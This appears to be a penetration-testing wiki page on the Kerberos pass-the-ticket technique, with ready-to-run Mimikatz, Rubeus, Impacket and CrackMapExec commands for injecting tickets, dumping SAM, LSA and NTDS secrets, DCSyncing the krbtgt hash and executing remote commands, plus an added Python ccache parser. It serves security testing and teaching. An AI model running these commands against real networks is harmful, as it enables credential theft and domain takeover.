Pass the ticket

MITRE ATT&CK™ Sub-technique T1550.003

Theory

Overpass-the-hash, silver ticket and golden ticket attacks are used by attackers to obtain illegitimate tickets. A ticket (TGT or service ticket, forged or not) can then be used to authenticate to a system using Kerberos without knowing any password. This is called Pass-the-ticket.

Practice

Tip: convert ticket to UNIX <-> Windows format

Tickets can be converted between the UNIX (.ccache) and Windows (.kirbi) formats with ticketConverter.py.

# Windows -> UNIX
ticketConverter.py $ticket.kirbi $ticket.ccache

# UNIX -> Windows
ticketConverter.py $ticket.ccache $ticket.kirbi

Injecting the ticket

  • On Windows systems, tools like Mimikatz and Rubeus inject the ticket in memory. Native Microsoft tools can then use the ticket as usual.

  • On UNIX-like systems, the path to the .ccache ticket to use has to be referenced in the KRB5CCNAME environment variable.

UNIX-like

Once a ticket is obtained or created, it needs to be referenced in the KRB5CCNAME environment variable for it to be used by other tools.

export KRB5CCNAME=$path_to_ticket.ccache
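What the tools read from the file KRB5CCNAME points at is a credential cache in the MIT ccache format. The following added example (written for this page, not part of the original or of any tool mentioned here) builds a constructed version 4 ccache with one made-up credential for a fictitious realm and parses it back, listing the default principal, whether each credential is a TGT and whether it has already expired, which is the check to run before relying on (or investigating) a cache found on a host. Realm, user, times and ticket bytes are placeholders; header tags and authdata are skipped rather than decoded.

```python
import struct

def _cstr(b): return struct.pack(">I", len(b)) + b   # counted_octet_string: uint32 length, then bytes

def encode_principal(realm, *components, name_type=1):
    # principal: name_type, num_components, realm, then each name component (all big-endian)
    out = struct.pack(">II", name_type, len(components)) + _cstr(realm.encode())
    return out + b"".join(_cstr(c.encode()) for c in components)

def build_sample_ccache(client, server, endtime):  # constructed v4 ccache; key and ticket bytes are dummies
    hdr = b"\x05\x04" + struct.pack(">H", 0)                   # version 4 magic, empty header block
    cred = client + server
    cred += struct.pack(">H", 18) + _cstr(b"\x00" * 32)        # keyblock: enctype 18, dummy key
    cred += struct.pack(">IIII", endtime - 36000, endtime - 36000, endtime, endtime + 604800)
    cred += b"\x00" + struct.pack(">I", 0x40E10000)            # is_skey, ticket_flags
    cred += struct.pack(">II", 0, 0)                           # no addresses, no authdata
    cred += _cstr(b"CONSTRUCTED-TICKET") + _cstr(b"")          # ticket, second_ticket
    return hdr + client + cred                                 # default principal, then credentials

class _Reader:
    def __init__(self, data): self.data, self.pos = data, 0
    def take(self, n):
        self.pos += n
        return self.data[self.pos - n:self.pos]
    def u(self, fmt): return struct.unpack(fmt, self.take(struct.calcsize(fmt)))[0]
    def cstr(self): return self.take(self.u(">I"))
    def principal(self):
        self.u(">I")                                           # name_type, not needed here
        n = self.u(">I")
        realm = self.cstr().decode()
        return "/".join(self.cstr().decode() for _ in range(n)) + "@" + realm

def parse_ccache(data, now):  # returns default principal plus client/server/expiry per credential
    r = _Reader(data)
    if r.take(2) != b"\x05\x04":
        raise ValueError("not a version 4 ccache (expected 05 04 magic)")
    r.take(r.u(">H"))                                          # skip header tag block
    out = {"default_principal": r.principal(), "credentials": []}
    while r.pos < len(r.data):
        client, server = r.principal(), r.principal()
        r.u(">H"); r.cstr()                                    # keyblock: enctype + key bytes
        endtime = [r.u(">I") for _ in range(4)][2]             # authtime, starttime, endtime, renew_till
        r.take(5)                                              # is_skey (1 byte) + ticket_flags (4 bytes)
        for _ in range(r.u(">I")): r.u(">H"); r.cstr()         # addresses: addrtype + data
        for _ in range(r.u(">I")): r.u(">H"); r.cstr()         # authdata: ad_type + data
        r.cstr(); r.cstr()                                     # ticket, second_ticket
        out["credentials"].append({"client": client, "server": server, "endtime": endtime,
                                   "is_tgt": server.startswith("krbtgt/"), "expired": now >= endtime})
    return out
```

To inspect a real cache, pass `open(path, "rb").read()` and `int(time.time())` to parse_ccache; a non-v4 file or a truncated one raises instead of returning partial results.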

Windows

The simplest way of injecting the ticket is to supply the /ptt flag directly to the command used to request or create the ticket. Both mimikatz and Rubeus accept this flag.

This can also be done manually with mimikatz or Rubeus.

# mimikatz: use a .kirbi file
kerberos::ptt $ticket_kirbi_file

# mimikatz: use a .ccache file
kerberos::ptt $ticket_ccache_file

# Rubeus
Rubeus.exe ptt /ticket:$ticket_kirbi_file

It is then possible to list the tickets in memory using the klist command.

Passing the ticket

  • On Windows, once Kerberos tickets are injected, they can be used natively.

  • On UNIX-like systems, once the KRB5CCNAME variable is exported, the ticket can be used by tools that support Kerberos authentication.

Credentials dumping

The Impacket scripts like secretsdump (Python) have the ability to remotely dump hashes and LSA secrets from a machine.

secretsdump.py -k $TARGET

CrackMapExec (Python) has the ability to do it on a set of targets. The bh_owned module can set targets as "owned" in BloodHound (see dumping credentials from registry hives).

crackmapexec smb $TARGETS -k --sam
crackmapexec smb $TARGETS -k --lsa
crackmapexec smb $TARGETS -k --ntds

Lsassy (Python) has the ability to do it with higher success probabilities, as it offers multiple dumping methods. This tool can set targets as "owned" in BloodHound. It works standalone and also as a CrackMapExec module (see dumping credentials from lsass process memory).

crackmapexec smb $TARGETS -k -M lsassy
crackmapexec smb $TARGETS -k -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd
lsassy -k $TARGETS

On Windows, once the ticket is injected, it is used natively when accessing a service, for example with Mimikatz to extract the krbtgt hash.

lsadump::dcsync /dc:$DomainController /domain:$DOMAIN /user:krbtgt

Command execution

Some Impacket scripts (Python) enable testers to execute commands on target systems with Kerberos support.

psexec.py -k 'DOMAIN/USER@TARGET'
smbexec.py -k 'DOMAIN/USER@TARGET'
wmiexec.py -k 'DOMAIN/USER@TARGET'
atexec.py -k 'DOMAIN/USER@TARGET'
dcomexec.py -k 'DOMAIN/USER@TARGET'

CrackMapExec (Python) has the ability to do it on a set of targets.

crackmapexec winrm $TARGETS -k -x whoami
crackmapexec smb $TARGETS -k -x whoami

On Windows, legitimate tools like Sysinternals PsExec can then be used to open a cmd using that ticket.

.\PsExec.exe -accepteula \\$TARGET cmd

Resources